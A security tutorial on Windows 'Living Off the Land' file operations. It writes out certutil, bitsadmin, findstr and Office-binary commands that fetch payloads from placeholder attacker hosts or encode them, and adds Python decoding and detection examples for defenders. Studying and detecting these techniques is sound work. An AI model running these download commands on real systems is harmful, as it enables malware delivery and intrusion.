Here, we will show Windows built-in tools commonly used in "Living Off the Land" techniques for file operations, including download, upload, and encoding. These techniques are catalogued by the LOLBAS project.
Practice
Certutil is a Windows built-in utility for managing Certificate Services. It is used to dump and display Certification Authority (CA) configuration information and other CA components. However, it was found that certutil.exe can also download and Base64-encode arbitrary files that have nothing to do with certificates, using its -urlcache and -encode options. The encoded output is wrapped in "-----BEGIN CERTIFICATE-----" / "-----END CERTIFICATE-----" lines and can be reversed on the target with certutil -decode.
#Download a file (-split writes the fetched content to the given path, -f overwrites an existing file)
certutil -URLcache -split -f http://Attacker_IP/payload.exe C:\Windows\Temp\payload.exe
#Encode a file as Base64 (output is wrapped in BEGIN/END CERTIFICATE lines)
certutil -encode payload.exe Encoded-payload.txt
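To see what certutil -encode actually produces, and to recover the original file from such a blob on a non-Windows analysis box, here is an added Python example. It is not from the original page or the LOLBAS project; it assumes certutil's PEM-style wrapper (BEGIN/END CERTIFICATE lines, 64 Base64 characters per line, CRLF endings), and the payload bytes are a constructed stand-in for payload.exe.

```python
"""Added example (not from the original page): reproduce and reverse
certutil -encode output without a Windows host.

Assumption: certutil -encode writes the input file's Base64 between
"-----BEGIN CERTIFICATE-----" and "-----END CERTIFICATE-----" lines,
64 characters per line, with CRLF line endings.
"""
import base64

BEGIN = "-----BEGIN CERTIFICATE-----"
END = "-----END CERTIFICATE-----"


def certutil_encode(data: bytes) -> str:
    """Produce text equivalent to `certutil -encode infile outfile`."""
    b64 = base64.b64encode(data).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "\r\n".join([BEGIN, *lines, END]) + "\r\n"


def certutil_decode(text: str) -> bytes:
    """Recover the original bytes from certutil -encode output.

    Only the lines between the BEGIN and END markers are decoded, so the
    function also works when the blob has been pasted into a larger file
    or had its line endings changed in transit.
    """
    body = []
    inside = False
    for line in text.splitlines():
        line = line.strip()
        if line == BEGIN:
            inside = True
            continue
        if line == END:
            break
        if inside and line:
            body.append(line)
    if not inside:
        raise ValueError("no BEGIN CERTIFICATE marker found")
    return base64.b64decode("".join(body), validate=True)


def looks_like_certutil_blob(text: str) -> bool:
    """Triage heuristic: PEM markers wrapping something that is not a DER
    certificate. A real certificate body starts with the ASN.1 SEQUENCE
    tag 0x30; an executable or archive does not."""
    try:
        raw = certutil_decode(text)
    except ValueError:
        return False
    return len(raw) > 0 and raw[0] != 0x30


# Constructed sample: a fake MZ header stands in for payload.exe.
SAMPLE_PAYLOAD = b"MZ\x90\x00" + bytes(range(256)) * 2

if __name__ == "__main__":
    blob = certutil_encode(SAMPLE_PAYLOAD)
    print(blob[:120])
    print("round trip OK:", certutil_decode(blob) == SAMPLE_PAYLOAD)
    print("suspicious blob:", looks_like_certutil_blob(blob))
```

The 0x30 check is only a hint for triage: it separates a genuine certificate from an encoded binary, but nothing stops an attacker from prepending a byte to defeat it.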
The bitsadmin tool is a system administrator utility that can be used to create, download or upload Background Intelligent Transfer Service (BITS) jobs and check their progress. BITS is a low-bandwidth, asynchronous method to download and upload files from HTTP web servers and SMB servers. Additional information about the bitsadmin tool can be found at Microsoft Docs.
#Download a file (a one-shot /transfer job; the download runs in the BITS service rather than in the bitsadmin process)
bitsadmin.exe /transfer /Download /priority Foreground http://<ATTACKER_IP>/payload.exe c:\Users\Pwned\Desktop\payload.exe
The MITRE ATT&CK framework identifies this technique as BITS Jobs (T1197).
Findstr is a Microsoft built-in tool used to find text and string patterns in files. It is useful in that it helps users and system administrators search within files or parsed output. However, an unintended use was found: because /V prints every line that does not contain the given string, searching for a string that is absent from the file prints the whole file, so findstr.exe can copy remote files from SMB shares within the network as follows,
#Download a file from an SMB share (the redirect is handled by cmd.exe, not by findstr itself)
findstr /V dummystring \\MachineName\ShareFolder\test.exe > c:\Windows\Temp\test.exe
We may also use the Office binaries (Word, Excel, PowerPoint) to download malicious payloads. When given a URL as an argument, each of them fetches the remote file and places it in the user's Internet cache (INetCache) folder.
#Download a file using PowerPoint
Powerpnt.exe "http://<ATTACKING_IP>/TeamsAddinLoader.dll"
#Download a file using Excel
Excel.exe http://<ATTACKING_IP>/TeamsAddinLoader.dll
#Download a file using Word
winword.exe "http://<ATTACKING_IP>/TeamsAddinLoader.dll"
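From the defender's side, all four tools above leave a distinctive command line in process-creation telemetry. The following Python detector is an added example, not part of the original page or the LOLBAS project: it matches the certutil, bitsadmin, findstr and Office command lines shown above against constructed Sysmon-style events (the IP addresses, paths and share names are made up; the field names follow Sysmon Event ID 1, and the ATT&CK mappings other than T1197 are the author's own).

```python
"""Added example (not from the original page): flag the LOLBAS file
operations shown on this page in process-creation telemetry.

Assumptions: events carry Sysmon-style "Image" and "CommandLine" fields;
the sample events below are constructed, not real logs.
"""
import re
from ntpath import basename  # splits Windows paths correctly on any host OS

URL = r"https?://\S+"
UNC = r"\\\\\S+\\\S+"  # \\server\share\... on the command line

# (binary name, regex over the full command line, label); matched case-insensitively.
RULES = [
    ("certutil.exe", rf"-urlcache\b.*{URL}", "certutil download (T1105)"),
    ("certutil.exe", r"-(encode|decode)\b", "certutil encode/decode (T1140)"),
    ("bitsadmin.exe", rf"/(transfer|addfile)\b.*{URL}", "BITS job download (T1197)"),
    # findstr's own command line never contains the "> file" redirect: cmd.exe
    # performs it, so match on /V plus a UNC source path instead.
    ("findstr.exe", rf"/v\b.*{UNC}", "findstr read from SMB share (T1105)"),
    ("powerpnt.exe", URL, "Office binary fetching remote file (T1105)"),
    ("excel.exe", URL, "Office binary fetching remote file (T1105)"),
    ("winword.exe", URL, "Office binary fetching remote file (T1105)"),
]


def classify(image: str, command_line: str) -> list[str]:
    """Return the labels of every rule the event matches (empty if none)."""
    exe = basename(image).lower()
    hits = []
    for binary, pattern, label in RULES:
        if exe == binary and re.search(pattern, command_line, re.IGNORECASE | re.DOTALL):
            hits.append(label)
    return hits


def scan(events):
    """Yield (event, labels) for every event matching at least one rule."""
    for event in events:
        labels = classify(event["Image"], event["CommandLine"])
        if labels:
            yield event, labels


# Constructed sample events: five abuses from this page and three benign look-alikes.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -URLcache -split -f http://10.10.10.5/payload.exe C:\Windows\Temp\payload.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -encode payload.exe Encoded-payload.txt"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -dump C:\certs\server.cer"},  # benign
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer /Download /priority Foreground http://10.10.10.5/payload.exe c:\Users\Pwned\Desktop\payload.exe"},
    {"Image": r"C:\Windows\System32\findstr.exe",
     "CommandLine": r"findstr /V dummystring \\FILESRV\Share\test.exe"},
    {"Image": r"C:\Windows\System32\findstr.exe",
     "CommandLine": r'findstr /I "error" C:\logs\app.log'},  # benign
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'winword.exe "http://10.10.10.5/TeamsAddinLoader.dll"'},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\Pwned\report.docx"'},  # benign
]

if __name__ == "__main__":
    for event, labels in scan(SAMPLE_EVENTS):
        print(f"{', '.join(labels):45} {event['CommandLine']}")
```

The Office rule is the noisiest in practice, since Word and Excel legitimately open https:// links to SharePoint and OneDrive; in a real deployment allow-list the tenant's document hosts or require a non-document extension in the URL before alerting.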
Note that other tools can be used for file operations. We suggest visiting the LOLBAS project to check them out.